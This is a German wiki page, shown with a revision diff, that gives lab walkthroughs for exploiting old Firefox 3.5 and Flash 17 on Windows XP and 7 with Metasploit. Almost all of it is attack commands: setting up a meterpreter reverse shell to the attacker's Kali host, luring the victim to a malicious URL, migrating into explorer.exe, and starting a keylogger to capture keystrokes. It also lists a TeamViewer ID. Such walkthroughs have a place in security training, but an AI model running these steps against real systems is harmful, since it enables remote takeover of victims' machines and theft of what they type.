Metasploit browser Exlpoit: Unterschied zwischen den Versionen

Aus xinux.net
Zur Navigation springen Zur Suche springen
Zeile 8: Zeile 8:
  
 
=Action=
 
=Action=
starte metasploit
+
start metasploit
 
  msfconsole
 
  msfconsole
  

Version vom 2. September 2019, 10:15 Uhr

Setup target

Winxp Service pack 3 Firefox 3.5

Setup Hacker

Kali Linux ip: 192.168.242.53

Action

start metasploit

msfconsole
use exploit/multi/browser/firefox_escape_retval
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.242.53 (lokaler Host)
set svrhost 192.168.242.53 (HTTP-Server IP)
set svrport 8888 (HTTP-Server Port)
set lport 4444 (lokaler Port)
set uripath /hack (optional)
exploit
jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack
wenn wir meterpreter > sehen hat der exploit funktioniert 
session - i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

Win7 32bit Exploit

http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html


  • Setup Opfer

win732 bit

adobeflash 17.0.0.134

firefox

TeamViewer ID 597 708 786

Hackersystem

kali linux

ip 192.168.244.50

on the console

metasploit konsole starten

  • msfconsole

auswahl des exploits

  • use exploit/windows/browser/adobe_flash_domain_memory_uaf

auswahl der schadsoftware

  • set payload windows/meterpreter/reverse_tcp

setzen des localhost

  • set lhost 192.168.244.50

setzen des webservers

  • set srvhost 192.168.244.50

pfad zum hack

  • set uripath /hack

ausführen des exploits

  • exploit

on the target

on the hackersystem

commandos

sessions -l (listet die sessions)
sessions -i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

method

session betreten

  • msf exploit(adobe_flash_domain_memory_uaf) > sessions -i 1

ps listing

  • meterpreter > ps